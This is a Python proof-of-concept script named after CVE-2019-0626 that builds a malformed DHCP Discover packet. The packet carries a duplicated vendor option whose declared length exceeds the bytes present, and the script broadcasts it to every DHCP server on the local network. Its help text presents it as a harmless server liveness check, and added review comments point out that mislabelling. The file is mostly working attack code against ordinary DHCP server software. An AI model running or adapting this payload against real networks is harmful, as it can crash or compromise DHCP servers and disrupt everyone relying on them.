CVE-2019-0626.py
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
import os
import sys
import argparse
from time import time
import re
import socket
import struct
from uuid import getnode
from random import randint
# UDP port a DHCP/BOOTP server listens on.
DHCP_SERVER_PORT = 67
# UDP port a DHCP/BOOTP client sends from and listens on.
DHCP_CLIENT_PORT = 68
# Limited-broadcast address: a datagram sent here reaches every DHCP listener
# on the local segment, not one specific server.
DEFAULT_DHCP_SERVER_ADDRESS = "255.255.255.255"
# Socket timeout in seconds applied to the client socket.
WAIT_TIMEOUT = 10
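class DHCPDiscover:
    """Builder for one BOOTP/DHCP Discover datagram with a fixed option list.

    The option area is not a well-formed client request: option 43
    (vendor-specific information) appears twice, and the second instance
    declares a length of 15 although only 10 value bytes follow before the
    End option. For detection and parser hardening, the relevant invariant
    is that an option's length byte must never exceed the bytes remaining in
    the datagram.
    NOTE(review): presumably this length mismatch is what the file name's
    CVE identifier refers to; confirm against the vendor advisory.
    """

    def __init__(self):
        # 4-byte transaction ID (xid), picked at random for each instance.
        self.transactionID = bytes(randint(0, 255) for _ in range(4))

    def buildPacket(self, mac_address):
        """Return the Discover datagram as bytes and print a hex dump of it.

        Args:
            mac_address: client hardware address as 12 hexadecimal digits
                without separators (e.g. ``'001122334455'``). Only the first
                12 characters are used.

        Returns:
            The assembled datagram (281 bytes).

        Raises:
            ValueError: if the first 12 characters are not six hex octets.
        """
        # The original script used the Python 2 print statement and
        # str.encode('hex') under a python3 shebang; bytes.fromhex and
        # print() below make the method run on Python 3.
        mac_bytes = bytes.fromhex(mac_address[:12])
        if len(mac_bytes) != 6:
            raise ValueError('mac_address must contain 12 hexadecimal digits')

        fields = [
            b'\x01',                 # Message type: Boot Request (1)
            b'\x01',                 # Hardware type: Ethernet
            b'\x06',                 # Hardware address length: 6
            b'\x00',                 # Hops: 0
            self.transactionID,      # Transaction ID
            b'\x00\x00',             # Seconds elapsed: 0
            b'\x80\x00',             # Bootp flags: 0x8000 (Broadcast) + reserved flags
            b'\x00\x00\x00\x00',     # Client IP address: 0.0.0.0
            b'\x00\x00\x00\x00',     # Your (client) IP address: 0.0.0.0
            b'\x00\x00\x00\x00',     # Next server IP address: 0.0.0.0
            b'\x00\x00\x00\x00',     # Relay agent IP address: 0.0.0.0
            mac_bytes,               # Client MAC address
            b'\x00' * 10,            # Client hardware address padding
            # The two empty fields below total 192 zero bytes; the BOOTP
            # layout splits them 64 + 128, which is indistinguishable here
            # because every byte is zero.
            b'\x00' * 67,            # Server host name (empty)
            b'\x00' * 125,           # Boot file name (empty)
            b'\x63\x82\x53\x63',     # Magic cookie: DHCP
            b'\x35\x01\x01',         # Option: (t=53,l=1) DHCP Message Type = DHCP Discover
            b'\x3d\x06' + mac_bytes, # Option: (t=61,l=6) Client identifier
            b'\x37\x03\x03\x01\x06', # Option: (t=55,l=3) Parameter Request List
            # Option: (t=43,l=10) vendor-specific information, 10 value bytes.
            b'\x2b\x0a\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12',
            # Option: (t=43,l=15) second vendor-specific option; the declared
            # length is larger than the 10 value bytes actually present.
            b'\x2b\x0f\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12',
            b'\xff',                 # End Option
        ]
        packet = b''.join(fields)

        # Debug dump of the datagram as \xNN escapes, one per byte. The
        # original loop also left a dangling "\x" after the last byte.
        print(''.join('\\x%02x' % octet for octet in packet))
        return packet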
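if __name__ == '__main__':
    # Command-line entry point: build one DHCP Discover datagram and send it
    # from UDP port 68 to the chosen server address on UDP port 67.
    # NOTE(review): the description string below presents this as a liveness
    # probe, but no reply is ever read and the datagram built by
    # DHCPDiscover.buildPacket is not a well-formed client request.
    parser = argparse.ArgumentParser(description='send a DHCP request to DHCP server to see if it\'s up and running')
    parser.add_argument('-m', action='store', dest='mac_address', help='MAC address. Default the MAC of this host')
    parser.add_argument('-s', action='store', dest='dhcp_server_address', help='DHCP Server address. Default %s'%DEFAULT_DHCP_SERVER_ADDRESS)
    args = parser.parse_args()

    if args.mac_address:
        my_mac_address = re.sub(':', '', args.mac_address)
    else:
        # Zero-pad to 12 hex digits: slicing hex(getnode()) drops leading
        # zeros, which shifts every octet of the address that gets sent.
        my_mac_address = '%012x' % getnode()
    # Reject anything that is not exactly six hex octets before it reaches
    # the packet builder, so a malformed -m value fails with a usage error.
    if not re.fullmatch(r'[0-9a-fA-F]{12}', my_mac_address):
        parser.error('MAC address must be 12 hexadecimal digits, optionally separated by ":"')

    # With no -s argument the destination is the limited-broadcast address,
    # so the datagram is delivered to every DHCP listener on the segment.
    dhcp_server_address = args.dhcp_server_address or DEFAULT_DHCP_SERVER_ADDRESS

    dhcp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        dhcp_client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        dhcp_client.settimeout(WAIT_TIMEOUT)
        try:
            # Port 68 is a privileged port on most systems and may already
            # be held by the host's own DHCP client.
            dhcp_client.bind(('', DHCP_CLIENT_PORT))
        except OSError:
            sys.exit('Can\'t bind dhcp client port %d '%DHCP_CLIENT_PORT)

        discoverPacket = DHCPDiscover()
        dhcp_client.sendto(discoverPacket.buildPacket(my_mac_address), (dhcp_server_address, DHCP_SERVER_PORT))
        # The message mentions waiting, but the socket is closed right after
        # the send; no response is received or inspected.
        print('DHCP Discover sent to %s\nwaiting for reply...'%dhcp_server_address)
    finally:
        # Release the socket on every path, including the early exits above.
        dhcp_client.close()
    sys.exit(0)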